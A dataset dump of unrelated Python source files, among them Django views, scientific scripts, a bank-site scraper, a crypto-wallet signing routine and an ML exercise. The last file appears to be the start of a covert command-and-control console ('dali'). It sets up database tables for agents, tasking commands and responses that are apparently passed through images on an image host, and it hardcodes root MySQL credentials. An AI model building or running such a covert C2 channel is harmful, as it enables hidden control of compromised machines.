Columns: content (string, lengths 0 to 894k), type (string, 2 classes)
"""bis URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/3.0/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.contrib import admin from django.urls import path, include from django.conf.urls.static import static from django.conf import settings from django.contrib.auth import views as auth_views from ajax_select import urls as ajax_select_urls from .apps.accounts.urls import UserLogin urlpatterns = [ path('', UserLogin.as_view(), name='root'), # Start Custom Apps # Accounts app path('', include(('bis.apps.accounts.urls', 'users'), namespace='users')), # Gepian Dashboard app path('', include(('bis.apps.gepiandashboard.urls', 'gepian'), namespace='gepian')), # Incubator app path('', include(('bis.apps.incubator.urls', 'incubator'), namespace='incubator')), # End Custom Apps # Admin panel path('admin/', admin.site.urls), # Password recovery path('password_reset/done/', auth_views.PasswordResetDoneView.as_view(), name='password_reset_done'), path('reset/done/', auth_views.PasswordResetCompleteView.as_view(), name='password_reset_complete'), # Ajax Select path('ajax_select/', include(ajax_select_urls)), ] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
python
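The namespaced includes above mean that URL names from the bundled apps are reversed with their namespace prefix. A minimal sketch (only 'root' is defined in this file; the 'login' name inside bis.apps.accounts.urls is an assumption for illustration):

from django.urls import reverse

reverse('root')          # the '' route served by UserLogin
reverse('users:login')   # hypothetical name registered under the 'users' namespace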
Desc = cellDescClass("CLKBUFX16")
Desc.properties["cell_leakage_power"] = "5029.443900"
Desc.properties["cell_footprint"] = "clkbuf"
Desc.properties["area"] = "63.201600"
Desc.pinOrder = ['A', 'Y']
Desc.add_arc("A", "Y", "combi")
Desc.set_job("buf")  # A
Desc.add_param("area", 63.201600)
Desc.add_pin("A", "input")
Desc.add_pin("Y", "output")
Desc.add_pin_func("Y", "unknown")
CellLib["CLKBUFX16"] = Desc
python
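Assuming the cellDescClass and CellLib definitions that the snippet above relies on, the resulting entry is read back like any dictionary; a minimal sketch:

desc = CellLib["CLKBUFX16"]
print(desc.properties["area"], desc.pinOrder)   # '63.201600' ['A', 'Y']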
{ "targets": [{ "target_name": "jimp-native", "cflags": ["-fexceptions"], "cflags!": [ "-fno-exceptions" ], "cflags_cc": [ "-std=c++17", "-fexceptions" ], "cflags_cc!": [ "-fno-exceptions" ], 'defines': ['_HAS_EXCEPTIONS=1'], "sources": [ "<!@(node gyp-source-loader.js)" ], 'include_dirs': [ "<!@(node -p \"require('node-addon-api').include.replace(/(\s+)/g, '\\\\\$1')\")", ], 'libraries': [], 'dependencies': [ "<!(node -p \"require('node-addon-api').gyp.replace(/(\s+)/g, '\\\\\$1')\")" ], 'msvs_settings': { 'VCCLCompilerTool': { 'ExceptionHandling': 1, 'AdditionalOptions': ['-std:c++17'] }, }, }] }
python
#!/usr/bin/python3

import matplotlib.pyplot as plt
import logging
import math

from tgblib import util
from tgblib.data import get_data, get_data_ul

logging.getLogger().setLevel(logging.INFO)

if __name__ == '__main__':

    util.set_my_fonts(mode='talk')
    show = False
    label = 'std'

    NU_TITLE = {0: 'Nu1a', 1: 'Nu1b', 2: 'Nu2a', 3: 'none', 4: 'Nu2b'}
    VTS_TITLE = {0: 'with GT corrections', 1: 'without GT corrections', 2: 'Ve2a', 3: 'Ve2b', 4: 'Ve2c'}
    MARKERS = {0: 'o', 1: 's', 2: 'o', 3: 's', 4: '*'}
    COLORS = {0: 'k', 1: 'r', 2: 'k', 3: 'r', 4: 'b'}

    MINOR_TICK = 7.5
    MAJOR_TICK = 12

    # 2017
    fluxes = dict()
    for iper in [0, 1]:
        fluxes[iper] = dict()

        plt.figure(figsize=(8, 6), tight_layout=True)
        ax = plt.gca()
        ax.set_yscale('log')
        ax.set_xscale('log')
        ax.set_title('Nov. 2017' if iper == 0 else 'Dec. 2017')
        ax.set_ylabel(r'$E^2\;\mathrm{d}N/\mathrm{d}E\;[\mathrm{erg\;s^{-1}\;cm^{-2}}]$')
        ax.set_xlabel(r'$E\;[\mathrm{keV}]$')
        ax.tick_params(which='minor', length=MINOR_TICK)
        ax.tick_params(which='major', length=MAJOR_TICK)

        for nn, gt in enumerate([True, False]):
            vtsEnergy, vtsFlux, vtsFluxErr = get_data(iper, onlyVTS=True, GT=gt)
            vtsEnergyUL, vtsFluxUL = get_data_ul(iper, GT=gt)

            ax.errorbar(
                [e * (1 + 0.02 * nn) for e in vtsEnergy],
                vtsFlux,
                yerr=vtsFluxErr,
                color=COLORS[nn],
                linestyle='none',
                label=VTS_TITLE[nn],
                marker=MARKERS[nn]
            )

            if len(vtsEnergyUL) > 0:
                vtsFluxErrUL = [p - pow(10, math.log10(p) - 0.1) for p in vtsFluxUL]
                ax.errorbar(
                    vtsEnergyUL,
                    vtsFluxUL,
                    yerr=vtsFluxErrUL,
                    uplims=True,
                    color=COLORS[nn],
                    linestyle='none',
                    marker=MARKERS[nn]
                )

            fluxes[iper][nn] = vtsFlux

        ax.set_ylim(0.8e-13, 5e-12)
        ax.set_xlim(1e8, 2e10)

        myTicks = [1e8, 1e9, 1e10]
        myLabels = [r'$10^{8}$', r'$10^{9}$', r'$10^{10}$']
        ax.set_xticks(myTicks)
        ax.set_xticklabels(myLabels)

        ax.legend(loc='best', frameon=False)

        figName = 'figures/DataVTS_GTcomparison_{}'.format(iper)
        plt.savefig(figName + '.png', format='png', bbox_inches='tight')
        plt.savefig(figName + '.pdf', format='pdf', bbox_inches='tight')

    # Calculating ratios
    for iper in [0, 1]:
        nn = 3 if iper == 0 else 2
        for ii in range(nn):
            print(ii)
            a = fluxes[iper][0][ii]
            b = fluxes[iper][1][ii + 1]
            ratio = (a - b) / (a + b) / 2
            print(ratio)
python
def mandel(x, y, max_iters, value):
    """
    Given the real and imaginary parts of a complex number,
    determine if it is a candidate for membership in the
    Mandelbrot set given a fixed number of iterations.
    """
    i = 0
    c = complex(x, y)
    z = 0.0j
    for i in range(max_iters):
        z = z * z + c
        if (z.real * z.real + z.imag * z.imag) >= 4:
            value[0] = i
            return 0

    value[i] = 255
    return 1
python
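A minimal usage sketch for the function above (the list sizing is an assumption driven by the value[i] write in the non-escaping branch):

max_iters = 100
value = [0] * max_iters                               # one slot per iteration index
escaped = mandel(2.0, 2.0, max_iters, value) == 0     # (2, 2) escapes on the first iteration
print(escaped, value[0])                              # True 0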
# -*- coding: utf-8 -*-
import os


def get_list(path):
    j = 0
    f = open('cemianTrain.txt', 'w')
    for i in os.listdir(path):
        print(i)
        f.write(os.path.join('/', i))
        j += 1
        if j % 2 == 0:
            f.write('\n')
        else:
            f.write(' ')
    f.close()


def get_list1(path):
    f = open('holderTrain.txt', 'w')
    for i in os.listdir(path):
        if i.split('_')[-1] == 'label.png':
            pass
        else:
            f.write(os.path.join('/', i))
            f.write(' ')
            f.write(os.path.join('/', i.split('.')[0] + '_label.png'))
            f.write('\n')
    f.close()


get_list1('holder/')
python
from core import RunBossSpider
from data.tool.handler import HandlerData
from flask import Flask


def run_proxy():
    pass


def run_web():
    app = Flask(__name__)

    @app.route('/')
    def index():
        return 'Hello World'

    app.run()


def main():
    # Start the crawler
    boss_spi = RunBossSpider()
    boss_spi.run()
    # Start the data analysis
    hd = HandlerData('../../data/')
    hd.run()


if __name__ == '__main__':
    # run_proxy()
    # main()
    run_web()
python
import csv

from django.db.models import Q
from django.http import HttpResponse
from django.template import Context, loader
from django.template.loader import get_template
from pymedtermino.umls import *
from weasyprint import HTML

from modules.cnmb.models import Physic
from modules.cnmb.utils.dto import CnmbDto
from modules.umls.utils.dto import ConceptDTO, DataUmls, DataCsv, Relation
from modules.umls.views import connect_to_umls


def generate_data_cnmb():
    query_physics = Physic.objects.using('cnmb').order_by('name')
    physic_list = []
    codes = read_codes_cnmb()
    list_by_csv = []
    cnmb_list = []
    for code in codes:
        list_by_csv = query_physics.filter(
            Q(group__code=code) | Q(name__istartswith=code) | Q(
                group__parent__code=code) | Q(
                group__parent__parent__code=code) | Q(
                group__parent__parent__parent__code=code) | Q(
                group__parent__parent__parent__parent__code=code) | Q(
                group__parent__parent__parent__parent__parent__code=code)).all()
        physic_list.extend(list_by_csv)

    for physic in physic_list:
        cnmb_dto = CnmbDto()
        cnmb_dto.physic = physic
        cnmb_dto.care_level_one = physic.cares.filter(level='I').first()
        cnmb_dto.care_level_second = physic.cares.filter(level='II').first()
        cnmb_dto.care_level_third = physic.cares.filter(level='III').first()
        cnmb_list.append(cnmb_dto)
    return cnmb_list


def generate_report_cnmb(request):
    print(request.GET)
    if 'button-print-pdf' in request.GET.keys():
        return report_cnmb_pdf(request)
    else:
        return report_cnmb_txt(request)


def report_cnmb_pdf(request):
    cnmb_list = generate_data_cnmb()
    html_template = get_template('search_cnmb.html').render(
        {'title': 'Resultados de Búsqueda', 'object_list': cnmb_list})
    pdf_file = HTML(string=html_template).write_pdf()
    http_response = HttpResponse(pdf_file, content_type='application/pdf')
    return http_response


def generate_data_umls():
    data_csv_list = read_codes_umls()
    connect_to_umls()
    list_umls_cui = []
    concepts = []
    for data_csv in data_csv_list:
        umls_cui = UMLS_CUI(data_csv.code)
        umls = DataUmls()
        umls.umls = umls_cui
        umls.term = data_csv.name
        list_umls_cui.append(umls)
    codes_list = [data.code for data in data_csv_list]
    for umls_cui in list_umls_cui:
        for el in ['may_be_treated_by', 'may_be_prevented_by',
                   'may_be_diagnosed_by', 'may_treat', 'may_prevent',
                   'may_diagnose']:
            if el in umls_cui.umls.relations:
                for relations in getattr(umls_cui.umls, el):
                    if relations.code.upper() in codes_list:
                        concept = ConceptDTO()
                        concept.relation = Relation()
                        concept.code = umls_cui.umls.code
                        concept.term = umls_cui.umls.term
                        concept.original_terminologies = ' '.join(
                            list(umls_cui.umls.original_terminologies))
                        concept.relation.term = relations.term
                        concept.terminology = umls_cui.umls.terminology.name
                        concept.term_umls = umls_cui.term
                        concept.relation_selected = el
                        concept.relation.code = relations.code
                        concepts.append(concept)
    return concepts


def generate_report_umls(request):
    if 'button-print-pdf' in request.GET.keys():
        return report_umls_pdf(request)
    else:
        return report_umls_txt(request)


def report_umls_pdf(request):
    concepts = generate_data_umls()
    html_template = get_template('search_umls.html')
    html = html_template.render(
        {'title': 'Resultados de Búsqueda', 'object_list': concepts})
    pdf_file = HTML(string=html).write_pdf()
    response = HttpResponse(pdf_file, content_type='application/pdf')
    response['Content-Disposition'] = 'filename="results.pdf"'
    return response


def read_codes_umls():
    """Store the UMLS codes listed in the CSV file.

    :return: list of codes read from the file
    """
    codes_list = []
    with open('codes_umls.csv', mode='r') as csv_file:
        csv_reader = csv.DictReader(csv_file, delimiter=';')
        for row in csv_reader:
            if 'CUI' in row and 'NAME' in row:
                data = DataCsv()
                data.code = row['CUI'].upper()
                data.name = row['NAME']
                codes_list.append(data)
    return codes_list


def read_codes_cnmb():
    """Store the CNMB medication codes listed in the CSV file.

    :return: list of codes read from the file
    """
    codes_list = []
    with open('codes_cnmb.csv', mode='r') as csv_file:
        csv_reader = csv.DictReader(csv_file, delimiter=';')
        for row in csv_reader:
            if 'code' in row:
                codes_list.append(row['code'])
    return codes_list


def report_umls_txt(request):
    concepts = generate_data_umls()
    response = HttpResponse(content_type='text/csv')
    response['Content-Disposition'] = 'attachment; filename="results_umls.txt"'
    writer = csv.writer(response)
    writer.writerow(
        ['Codigo', 'TerminoUml', 'Termino', 'Relacion', 'CodigoRelacion',
         'TerminoRelacion', 'Terminologia'])
    for concept in concepts:
        writer.writerow(
            [concept.code, concept.term_umls, concept.term,
             concept.relation_selected, concept.relation.code,
             concept.relation.term, concept.original_terminologies])
    return response


def report_cnmb_txt(request):
    cnmb_list = generate_data_cnmb()
    response = HttpResponse(content_type='text/csv')
    response['Content-Disposition'] = 'attachment; filename="results_cnmb.txt"'
    writer = csv.writer(response)
    writer.writerow(
        ['Codigo', 'Descripcion', 'FormaFarmaceutica', 'Concentracion',
         'NivelPrescripcion', 'NivelAtencionI', 'NivelAtencionII',
         'NivelAtencionIII', '2N', 'Descripcion2N', '1N', 'Descripcion1N'])
    for cnmb in cnmb_list:
        one_level = 'Si' if cnmb.care_level_one is not None else 'No'
        sec_level = 'Si' if cnmb.care_level_second is not None else 'No'
        third_level = 'Si' if cnmb.care_level_third is not None else 'No'
        writer.writerow(
            [cnmb.physic.group.code, cnmb.physic.name,
             cnmb.physic.pharmaceuticalform, '',
             cnmb.physic.prescription_level.level, one_level, sec_level,
             third_level,
             cnmb.physic.group.parent.parent.parent.code,
             cnmb.physic.group.parent.parent.parent.name,
             cnmb.physic.group.parent.parent.parent.parent.code
             if cnmb.physic.group.parent.parent.parent.parent is not None else '',
             cnmb.physic.group.parent.parent.parent.parent.name
             if cnmb.physic.group.parent.parent.parent.parent is not None else ''])
    return response
python
from setuptools import setup, find_packages

version = '1.0.0'

setup(
    name="alerta-query",
    version=version,
    description='Alerta Generic Webhook by query parameters',
    url='https://github.com/alerta/alerta-contrib',
    license='MIT',
    author='Pablo Villaverde',
    author_email='[email protected]',
    packages=find_packages(),
    py_modules=['alerta_query'],
    install_requires=[],
    include_package_data=True,
    zip_safe=True,
    entry_points={
        'alerta.webhooks': [
            'query = alerta_query:QueryWebhook'
        ]
    }
)
python
import requests
from bs4 import BeautifulSoup
import re
from datetime import datetime
from base_bank import BankBase
import unicodedata


class Bank(BankBase):
    def __init__(self):
        BankBase.__init__(self)
        self._bank_session = requests.Session()
        self._base_url = 'https://online.bbt.com'
        self._auth_url = '/auth/pwd.tb'

    def authenticate(self, username, password):
        request_payload = {'BrowserDetective': 'General Inquiry',
                           'var_field': '',
                           'UserName': username,
                           'inq': 'O',
                           'Password': password}
        auth_request = self._bank_session.post(self._base_url + self._auth_url, data=request_payload)
        return auth_request.text

    def navigate(self, homepage):
        home_soup = BeautifulSoup(homepage)
        accounts = []

        # parse credit card accounts
        for link in home_soup.find_all(href=re.compile('/olbsys/bbtolbext/bankcards/+')):
            if link.div is not None:
                type_and_lastno = link.div.contents[0].strip().rsplit(None, 1)
                account = {
                    'url': link.get('href'),
                    'type': type_and_lastno[0],
                    'lastno': type_and_lastno[1],
                    'amount': link.div.h3.get_text().strip() + ' ' + link.div.span.get_text()
                }
                accounts.append(account)

        print('\nYou have ' + str(len(accounts)) + ' account options.\n')
        for index, account in enumerate(accounts):
            print('Option [' + str(index) + '] is a ' + account['type'] + ' account ending in '
                  + account['lastno'] + ' with a balance of $' + account['amount'])

        input_account = raw_input('\nChoose an account: ')
        self._bank_session.get((self._base_url + accounts[int(input_account)]['url']))

        cc_loan_params = {
            'action': 'managePostedTransactions',
            'flag': '3D',
            'rand': str(datetime.utcnow()),
            'resetForm': 'true'
        }
        cc_loan_table = self._bank_session.get('https://online.bbt.com/olbsys/bbtolbext/bankcards/manageDetails',
                                               params=cc_loan_params)
        return accounts[int(input_account)], cc_loan_table.text

    def parse(self, account, account_text):
        account_soup = BeautifulSoup(account_text)
        account_headers = []
        account_transactions = []

        for header in account_soup.table.thead.tr.find_all('th'):
            account_headers.append(header.get_text())
        account_transactions.append(account_headers)

        for row in account_soup.table.tbody.find_all('tr'):
            transaction_row = [row.th.get_text()]
            for table_data in row.find_all('td'):
                raw_table_data = unicodedata.normalize('NFKC', table_data.get_text())
                transaction_row.append(' '.join(raw_table_data.strip().split()))
            account_transactions.append(transaction_row)

        return account, account_transactions
python
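A minimal end-to-end sketch of how the scraper class above is driven (credentials are placeholders; the page structure is whatever navigate() and parse() expect):

bank = Bank()
homepage = bank.authenticate('myuser', 'mypassword')        # placeholder credentials
account, table_html = bank.navigate(homepage)                # interactive account choice
account, transactions = bank.parse(account, table_html)      # header row + transaction rows
print(transactions[0])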
from btchippython.btchip.bitcoinTransaction import bitcoinTransaction
from btchippython.btchip.btchip import btchip
from electrum_clone.electrumravencoin.electrum.transaction import Transaction
from electrum_clone.electrumravencoin.electrum.util import bfh
from electrum_clone.electrumravencoin.electrum.ravencoin import int_to_hex, var_int


def sign_transaction(cmd, tx, pubkeys, inputsPaths, changePath):
    inputs = []
    chipInputs = []
    redeemScripts = []
    output = None
    p2shTransaction = False
    segwitTransaction = False
    pin = ""

    # Fetch inputs of the transaction to sign
    for i, txin in enumerate(tx.inputs()):
        redeemScript = Transaction.get_preimage_script(txin)
        print("REDEEM SCRIPT: {}".format(redeemScript))
        txin_prev_tx = txin.utxo
        txin_prev_tx_raw = txin_prev_tx.serialize() if txin_prev_tx else None
        inputs.append([txin_prev_tx_raw,
                       txin.prevout.out_idx,
                       redeemScript,
                       txin.prevout.txid.hex(),
                       pubkeys[i],
                       txin.nsequence,
                       txin.value_sats()])

    txOutput = var_int(len(tx.outputs()))
    for o in tx.outputs():
        txOutput += int_to_hex(0 if o.asset else o.value.value, 8)
        script = o.scriptpubkey.hex()
        txOutput += var_int(len(script) // 2)
        txOutput += script
    txOutput = bfh(txOutput)

    for utxo in inputs:
        sequence = int_to_hex(utxo[5], 4)
        txtmp = bitcoinTransaction(bfh(utxo[0]))
        trustedInput = btchip.getTrustedInput(cmd, txtmp, utxo[1])
        trustedInput['sequence'] = sequence
        chipInputs.append(trustedInput)
        print("REDEEM SCRIPT 2: {}".format(txtmp.outputs[utxo[1]].script))
        redeemScripts.append(txtmp.outputs[utxo[1]].script)

    print("INPUTS: {}".format(inputs))

    # Sign all inputs
    firstTransaction = True
    inputIndex = 0
    rawTx = tx.serialize_to_network()
    btchip.enableAlternate2fa(cmd, False)

    while inputIndex < len(inputs):
        print('SIGNING: {}'.format(redeemScripts[inputIndex]))
        btchip.startUntrustedTransaction(cmd, firstTransaction, inputIndex,
                                         chipInputs, redeemScripts[inputIndex],
                                         version=tx.version)
        # we don't set meaningful outputAddress, amount and fees
        # as we only care about the alternateEncoding==True branch
        outputData = btchip.finalizeInput(cmd, b'', 0, 0, changePath, bfh(rawTx))
        outputData['outputData'] = txOutput
        if outputData['confirmationNeeded']:
            outputData['address'] = output
        else:
            # Sign input with the provided PIN
            inputSignature = btchip.untrustedHashSign(cmd, inputsPaths[inputIndex], pin,
                                                      lockTime=tx.locktime)
            inputSignature[0] = 0x30  # force for 1.4.9+
            my_pubkey = inputs[inputIndex][4]
            tx.add_signature_to_txin(txin_idx=inputIndex,
                                     signing_pubkey=my_pubkey.hex(),
                                     sig=inputSignature.hex())
        inputIndex = inputIndex + 1
        firstTransaction = False
python
#!/usr/bin/env python3 # python 3.5 without f strings import argparse import os, shutil, sys import uuid import itertools from glob import glob from snakemake.shell import shell from snakemake.io import glob_wildcards from multiprocessing import Pool def predict_genes(genome,fasta,out_dir,log): fna = "{}/{}.fna".format(out_dir,genome) faa = "{}/{}.faa".format(out_dir,genome) gff = "{}/{}.gff".format(out_dir,genome) shell('printf "{genome}:\n" > {log}'.format(genome=genome,log=log)) shell("prodigal -i {fasta} -o {gff} -d {fna} -a {faa} -p sinlge -c -m -f gff 2>> {log} ".format( fasta=fasta, log=log,gff=gff,fna=fna,faa=faa) ) shell('printf "\n" >> {log}'.format(log=log)) def predict_genes_genomes(input_dir,out_dir,log,threads): genomes_fastas = glob(os.path.join(input_dir,"*.fasta")) os.makedirs(out_dir,exist_ok=True) temp_log_dir = os.path.join(os.path.dirname(log), "tmp_" + uuid.uuid4().hex) os.makedirs(temp_log_dir, exist_ok=False) genome_names = [] log_names = [] for fasta in genomes_fastas: genome_name = os.path.splitext(os.path.split(fasta)[-1])[0] genome_names.append(genome_name) log_names.append(os.path.join(temp_log_dir, genome_name + '.prodigal.tmp')) pool = Pool(threads) pool.starmap(predict_genes, zip(genome_names,genomes_fastas, itertools.repeat(out_dir),log_names)) #cat in python with open(log, 'ab') as f_out: for logfile in log_names: with open(logfile,'rb') as f_in: shutil.copyfileobj(f_in, f_out) shell("rm -r {temp_log_dir}".format(temp_log_dir=temp_log_dir)) if __name__ == "__main__": try: log=open(snakemake.log[0],"w") sys.stderr= log sys.stdout= log predict_genes_genomes( snakemake.input.dir, snakemake.output[0], snakemake.log[0], int(snakemake.threads) ) except NameError: p = argparse.ArgumentParser() p.add_argument("--input-dir", required = True) p.add_argument("--out-dir", required = True) p.add_argument("--log", required = True) p.add_argument("--threads", required = False, default = 1, type = int) args = vars(p.parse_args()) predict_genes_genomes(**args)
python
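Outside of Snakemake the script falls back to the argparse interface above; a minimal sketch with placeholder paths, equivalent to running "python predict_genes.py --input-dir genomes/ --out-dir annotations/ --log prodigal.log --threads 4":

predict_genes_genomes(input_dir="genomes/", out_dir="annotations/",
                      log="prodigal.log", threads=4)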
"""The genome to be evolved.""" import random import logging import hashlib import copy from train import train_and_score from train import trainsimulation class Genome(): """ Represents one genome and all relevant utility functions (add, mutate, etc.). """ def __init__( self, all_possible_genes = None, geneparam = {}, u_ID = 0, mom_ID = 0, dad_ID = 0, gen = 0 ): """Initialize a genome. Args: all_possible_genes (dict): Parameters for the genome, includes: gene_nb_neurons_i (list): [64, 128, 256] for (i=1,...,6) gene_nb_layers (list): [1, 2, 3, 4] gene_activation (list): ['relu', 'elu'] gene_optimizer (list): ['rmsprop', 'adam'] """ self.accuracy = 0.0 self.all_possible_genes = all_possible_genes self.geneparam = geneparam #(dict): represents actual genome parameters self.u_ID = u_ID self.parents = [mom_ID, dad_ID] self.generation = gen self.numero = 0 #hash only makes sense when we have specified the genes if not geneparam: self.hash = 0 else: self.update_hash() def update_hash(self): """ Refesh each genome's unique hash - needs to run after any genome changes. """ genh = str(self.nb_neurons()) + self.geneparam['activation'] \ + str(self.geneparam['nb_layers']) + self.geneparam['optimizer'] self.hash = hashlib.md5(genh.encode("UTF-8")).hexdigest() self.accuracy = 0.0 def set_genes_random(self): """Create a random genome.""" #print("set_genes_random") self.parents = [0,0] #very sad - no parents :( for key in self.all_possible_genes: self.geneparam[key] = random.choice(self.all_possible_genes[key]) self.update_hash() def mutate_one_gene(self): """Randomly mutate one gene in the genome. Args: network (dict): The genome parameters to mutate Returns: (Genome): A randomly mutated genome object """ # Which gene shall we mutate? Choose one of N possible keys/genes. gene_to_mutate = random.choice( list(self.all_possible_genes.keys()) ) # And then let's mutate one of the genes. # Make sure that this actually creates mutation current_value = self.geneparam[gene_to_mutate] possible_choices = copy.deepcopy(self.all_possible_genes[gene_to_mutate]) possible_choices.remove(current_value) self.geneparam[gene_to_mutate] = random.choice( possible_choices ) self.update_hash() def set_generation(self, generation): """needed when a genome is passed on from one generation to the next. the id stays the same, but the generation is increased""" self.generation = generation #logging.info("Setting Generation to %d" % self.generation) def set_genes_to(self, geneparam, mom_ID, dad_ID): """Set genome properties. this is used when breeding kids Args: genome (dict): The genome parameters IMPROVE """ self.parents = [mom_ID, dad_ID] self.geneparam = geneparam self.update_hash() def trainsimulate(self, trainingset): """Train the genome and record the accuracy. Args: dataset (str): Name of dataset to use. """ return trainsimulation(self, trainingset) def train(self, trainingset, numero): """Train the genome and record the accuracy. Args: dataset (str): Name of dataset to use. """ #if self.accuracy == 0.0: #don't bother retraining ones we already trained # self.accuracy = train_and_score(self, trainingset, numero) # self.numero = numero def seterror(self, erro): """Train the genome and record the accuracy. Args: dataset (str): Name of dataset to use. 
""" if self.accuracy == 0.0: self.accuracy = erro def print_genome(self): """Print out a genome.""" logging.info("------------GENOMA-------------") self.print_geneparam() logging.info("Acc: %f" % self.accuracy) logging.info("UniID: %d" % self.u_ID) logging.info("Mom and Dad: %d %d" % (self.parents[0], self.parents[1])) logging.info("Gen: %d" % self.generation) logging.info("Hash: %s" % self.hash) logging.info("Numero modelo h5: %d" % self.numero) def print_genome_ma(self): """Print out a genome.""" self.print_geneparam() logging.info("Acc: %.2f%% UniID: %d Mom and Dad: %d %d Gen: %d" % (self.accuracy * 100, self.u_ID, self.parents[0], self.parents[1], self.generation)) logging.info("Hash: %s" % self.hash) # print nb_neurons as single list def print_geneparam(self): g = self.geneparam.copy() nb_neurons = self.nb_neurons() for i in range(1,7): g.pop('nb_neurons_' + str(i)) # replace individual layer numbers with single list g['nb_neurons'] = nb_neurons logging.info(g) # convert nb_neurons_i at each layer to a single list def nb_neurons(self): nb_neurons = [None] * 6 for i in range(0,6): nb_neurons[i] = self.geneparam['nb_neurons_' + str(i+1)] return nb_neurons
python
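A minimal usage sketch of the class above (the gene value lists are illustrative assumptions patterned after the constructor docstring):

all_possible_genes = {
    'nb_neurons_1': [64, 128, 256], 'nb_neurons_2': [64, 128, 256],
    'nb_neurons_3': [64, 128, 256], 'nb_neurons_4': [64, 128, 256],
    'nb_neurons_5': [64, 128, 256], 'nb_neurons_6': [64, 128, 256],
    'nb_layers': [1, 2, 3, 4],
    'activation': ['relu', 'elu'],
    'optimizer': ['rmsprop', 'adam'],
}

genome = Genome(all_possible_genes, geneparam={}, u_ID=1)
genome.set_genes_random()    # pick one value per gene and refresh the hash
genome.mutate_one_gene()     # flip a single gene to a different allowed value
genome.print_genome()        # logs the genome, accuracy, lineage and hash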
#!/usr/bin/python

import pickle
import numpy
numpy.random.seed(42)


### The words (features) and authors (labels), already largely processed.
### These files should have been created from the previous (Lesson 10)
### mini-project.
words_file = "../text_learning/your_word_data.pkl"
authors_file = "../text_learning/your_email_authors.pkl"
word_data = pickle.load(open(words_file, "rb"))
authors = pickle.load(open(authors_file, "rb"))


### test_size is the percentage of events assigned to the test set (the
### remainder go into training)
### feature matrices changed to dense representations for compatibility with
### classifier functions in versions 0.15.2 and earlier
from sklearn import model_selection
features_train, features_test, labels_train, labels_test = model_selection.train_test_split(
    word_data, authors, test_size=0.1, random_state=42)

from sklearn.feature_extraction.text import TfidfVectorizer
vectorizer = TfidfVectorizer(sublinear_tf=True, max_df=0.5, stop_words='english')
features_train = vectorizer.fit_transform(features_train)
features_test = vectorizer.transform(features_test).toarray()


### a classic way to overfit is to use a small number
### of data points and a large number of features;
### train on only 150 events to put ourselves in this regime
features_train = features_train[:150].toarray()
labels_train = labels_train[:150]


### your code goes here

# Calculating Decision Tree accuracy - assuming overfitting will happen
# when trained on only 150 training points
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import accuracy_score

clf = DecisionTreeClassifier()
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
acc = accuracy_score(pred, labels_test)
print("Accuracy:", acc)

# What's the importance of the most important feature?
# What is the number of this feature?
importances = clf.feature_importances_
for index, item in enumerate(importances):
    if item > 0.2:
        print(index, item)

import numpy as np
indices = np.argsort(importances)[::-1]
print('Feature Ranking: ')
for i in range(10):
    print("{} feature no. {} ({})".format(i + 1, indices[i], importances[indices[i]]))

# Result
# 33614 (0.7647058823529412)

# What's the most powerful word when your decision tree is making its
# classification decisions?
print(vectorizer.get_feature_names()[33614])
# Result
# sshacklensf

# Outlier after removing "sshacklensf" outlier
print(vectorizer.get_feature_names()[14343])
# Result
# cgermannsf

# Outlier after removing "cgermannsf" outlier
print(vectorizer.get_feature_names()[21323])
# Result
# houectect
python
#!/usr/bin/env python3 from PIL import Image import requests from io import BytesIO import base64 import os import sys from Crypto.Cipher import AES from colorama import * import random import json import mysql.connector from cmd import Cmd import hashlib import time # these dicts are how we manage options settings for the various modules like: Image, Album, Task, Agent create_options = {'Command': '', 'Response (No,Short,Long)': '', 'Base-Image': '', 'New-Filename': ''} album_options = {'Auth-Type': '', 'Title': ''} tasking_options = {'Tasking-Image': '', 'Title': '', 'Tags': '', 'Agent': '', 'Bearer-Token': ''} agent_options = {'Title': '', 'Tags': ''} # some nice hex ascii art thats not really ascii art at all ?? def ascii(): print("\n") print(Style.BRIGHT + Fore.YELLOW + " ~64 61 6C 69~" + Style.RESET_ALL) print("\n") # attempt to connect to MySQL, will fail if: # 1. MySQL is not running or 2. MySQL hasn't been configured for credentialed login by users # sets up the database 'dali', creates all tables with relevant columns # then exports the database connection for other functions to use def mysql_check(): try: mydb = mysql.connector.connect(host = 'localhost', user = 'root', password = 'root') mycursor = mydb.cursor() except mysql.connector.Error as err: print("Encountered MySQL error {}\n".format(err)) sys.exit(1) try: mycursor.execute("CREATE DATABASE dali") except mysql.connector.Error as err: if err.errno != 1007: print("Encountered MySQL error {}\n".format(err)) sys.exit(1) try: mycursor.execute("USE dali") except mysql.connector.Error as err: print("Encountered MySQL error {}\n".format(err)) sys.exit(1) try: mycursor.execute("CREATE TABLE Pictures (ID INT AUTO_INCREMENT PRIMARY KEY, md5 VARCHAR(255), filename VARCHAR(255), command VARCHAR(1000), response VARCHAR(255), token VARCHAR(255), album_deletehash VARCHAR(255))") except mysql.connector.Error as err: if err.errno != 1050: print("Encountered MySQL error {}\n".format(err)) sys.exit(1) try: mycursor.execute("CREATE TABLE Albums (ID INT AUTO_INCREMENT PRIMARY KEY, Album_Hash VARCHAR(255), Delete_Hash VARCHAR(255), Auth_Type VARCHAR(255), Token VARCHAR(255))") except mysql.connector.Error as err: if err.errno != 1050: print("Encountered MySQL error {}\n".format(err)) sys.exit(1) try: mycursor.execute("CREATE TABLE Tasking (Tasking_Image VARCHAR(255), Tasking_Command VARCHAR(255), Response TEXT, Title VARCHAR(255), Tags VARCHAR(255), Agent VARCHAR(255), Image_Hash VARCHAR(255), Delete_Hash VARCHAR(255), Token VARCHAR(255))") except mysql.connector.Error as err: if err.errno != 1050: print("Encountered MySQL error {}\n".format(err)) sys.exit(1) try: mycursor.execute("CREATE TABLE Agents (ID INT AUTO_INCREMENT PRIMARY KEY, Status VARCHAR(255), Title VARCHAR(255), Tags VARCHAR(255))") except mysql.connector.Error as err: if err.errno != 1050: print("Encountered MySQL error {}\n".format(err)) sys.exit(1) mycursor.close() return mydb # bare-bones implementation of this awesome class. 
